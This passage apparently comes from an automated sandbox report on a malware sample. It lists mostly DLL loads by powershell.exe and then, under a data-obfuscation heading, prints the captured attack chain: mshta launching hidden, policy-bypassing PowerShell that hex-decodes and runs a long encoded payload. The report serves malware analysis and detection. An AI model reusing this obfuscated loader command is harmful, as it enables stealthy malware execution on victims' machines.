                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 4.2.powershell.exe.6f60000.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 4.2.powershell.exe.6f60000.2.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 4.2.powershell.exe.6f60000.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 4.2.powershell.exe.6f60000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 4.2.powershell.exe.6f60000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Z));$ByTESTring = $eNC.$5i0JbyjAuxq1w2syC8nBHy6E2dFhjl9Jo19iPGiz68mBwchiWcAMIFdgIuM6C1BigrxWztkc1ltpoJyxzjE1vr83aYHbceP72RVCYl29Wo0DYCMUc7r2H3c2TPUFgK5J0F8KYw4smX8q71CMT82gf9PkIMLXvs
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B09326
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B09326Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D54A48 push 00086951h; ret 2_2_04D54A55
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D51150 push eax; ret 2_2_04D5115A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D51140 push eax; ret 2_2_04D5114A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D51160 push eax; ret 2_2_04D5116A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D51100 push eax; ret 2_2_04D5113A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00B9284A push ebx; iretd 4_2_00B92862
